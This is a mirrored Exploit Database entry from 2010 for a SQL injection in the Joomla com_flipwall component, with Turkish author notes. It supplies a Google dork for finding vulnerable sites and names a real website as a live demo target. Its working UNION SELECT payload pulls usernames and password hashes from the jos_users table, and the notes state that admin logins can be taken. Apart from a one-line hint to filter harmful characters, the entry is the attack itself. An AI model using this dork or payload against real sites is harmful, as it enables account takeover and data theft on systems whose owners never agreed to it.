Joomla! Component Pulse Infotech Flip Wall – SQL Injection

• Exploit Database
• 113 阅读

• 作者： FL0RiX
  日期： 2010-10-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15366/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  ========================================================= Joomla Component com_flipwall SQL Injection Vulnerability =========================================================   # Author: Fl0riX ~ Bug Researchers   # Name : Joomla com_flipwall   # Bug Type : SQL injection   # Dork: "com_flipwall"   # Infection : Admin Login Bilgileri Alinabilir.   # Demo Vuln : [+]http://0611.info/index.php?option=com_flipwall&controller=flipwall&catid=[EXPLOIT]   [+] Vendor:http://www.pulseextensions.com/   # Note: AsDemo Sitede Filtre Var Haberiniz olsun :)   # Bug Fix Advice : Zararli Karak terler Filtrenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : null+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users-- < -- bug code end of -- >